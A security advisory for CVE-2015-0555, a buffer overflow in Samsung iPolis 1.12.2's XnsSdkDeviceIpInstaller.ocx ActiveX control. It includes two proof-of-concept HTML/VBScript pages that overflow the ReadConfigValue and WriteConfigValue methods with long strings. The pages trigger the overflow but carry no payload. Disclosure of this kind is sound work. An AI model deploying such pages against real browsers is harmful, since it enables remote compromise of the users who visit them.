CVE-2015-0555 Introduction ************************************************************* There is a Buffer Overflow Vulnerability which leads to Remote Code Execution. Vulnerability is due to input validation to the API ReadConfigValue and WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx This is different from CVE-2014-3911 as the version of iPolis 1.12.2 (latest as of 12/12/2014). CVE-2014-3911 is related to different ActiveX and on older iPolis version Discovery MEthod: Fuzzing Exploiting: It is a client side attack where attacker can host a crafted HTML web page with malicious payload and entice the victim to browse to the hosted page to compromise the victim. Operating System: Windows 7 Ultimate N SP1 ************************************************************* Vulnerability1: *Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution* ******************Proof of Concept (PoC)**************8 </html> <head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue() Remote Code Execution</head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String" memberName = "ReadConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" argCount = 1 arg1=String(1044, "A") target.ReadConfigValue arg1 </script> </html> ***************************************************************************************** *Vulnerability2: * *Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution * *******************Proof of Concept (PoC)********************* <html> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" argCount = 2 arg1=String(14356, "A") arg2="defaultV" target.WriteConfigValue arg1 ,arg2 </script></job></package> </html> **************************************************************************** CERT contacted Samsung but there wasn't any response from Samsung. Refer http://blog.disects.com for more details Best Regards, Praveen Darshanam